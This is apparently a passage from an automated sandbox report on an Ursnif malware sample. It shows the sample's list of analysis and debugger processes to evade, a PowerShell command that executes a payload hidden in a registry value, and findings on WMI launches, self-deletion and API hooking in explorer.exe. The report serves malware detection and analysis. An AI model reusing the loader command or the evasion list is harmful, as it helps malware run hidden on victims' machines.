Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                      Suspicious powershell command line foundShow sources
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01207E1F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01207AB0 push ecx; ret
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7E1000 push eax; retf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7BC6E9 push 3B000001h; retf
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dllJump to dropped file
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)Show sources
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Deletes itself after installationShow sources
                      Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\start[526268].vbsJump to behavior
                      Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)Show sources